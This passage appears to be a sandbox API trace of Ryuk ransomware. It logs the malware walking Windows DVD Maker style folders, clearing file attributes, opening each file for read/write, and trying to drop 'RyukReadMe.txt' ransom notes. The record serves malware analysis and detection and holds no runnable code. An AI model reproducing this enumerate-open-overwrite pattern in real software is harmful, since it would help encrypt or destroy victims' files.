Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.584] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.584] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", dwFileAttributes=0x80) returned 0 [0133.584] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.584] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.585] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.585] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.585] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.585] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", dwFileAttributes=0x80) returned 0 [0133.586] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.586] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.586] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.586] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.586] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.587] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.587] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", dwFileAttributes=0x80) returned 0 [0133.587] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.587] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.587] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.587] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.588] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.588] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.588] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", dwFileAttributes=0x80) returned 0 [0133.588] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.589] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.589] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.589] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.589] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.589] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.589] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.590] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", dwFileAttributes=0x80) returned 0 [0133.590] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.590] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.590] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.590] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.590] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.591] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", dwFileAttributes=0x80) returned 0 [0133.591] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.591] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.591] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", dwFileAttributes=0x80) returned 0 [0133.591] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.592] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.592] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.592] SetLastError (dwErrCode=0x0) [0133.592] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.595] GetLastError () returned 0x5 [0133.595] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.595] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.595] SetLastError (dwErrCode=0x0) [0133.595] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.595] GetLastError () returned 0x5 [0133.595] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.595] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.596] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.596] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.597] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", dwFileAttributes=0x80) returned 0 [0133.597] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.597] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.597] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.597] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.597] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.598] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.598] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.598] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.598] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.598] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", dwFileAttributes=0x80) returned 0 [0133.598] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.599] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.599] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", dwFileAttributes=0x80) returned 0 [0133.599] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.599] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.599] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", dwFileAttributes=0x80) returned 0 [0133.600] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.600] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.600] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.600] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.601] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", dwFileAttributes=0x80) returned 0 [0133.601] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.601] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.601] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.601] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", dwFileAttributes=0x80) returned 0 [0133.601] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.601] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.601] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.601] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.602] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", dwFileAttributes=0x80) returned 0 [0133.602] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.602] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.602] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.602] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.602] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", dwFileAttributes=0x80) returned 0 [0133.603] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.603] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.603] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.603] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", dwFileAttributes=0x80) returned 0 [0133.603] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.603] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.603] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.604] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.604] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0133.604] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.604] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.604] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.604] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", dwFileAttributes=0x80) returned 0 [0133.604] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.605] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.605] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.605] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", dwFileAttributes=0x80) returned 0 [0133.605] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.605] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.605] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.605] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", dwFileAttributes=0x80) returned 0 [0133.606] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" 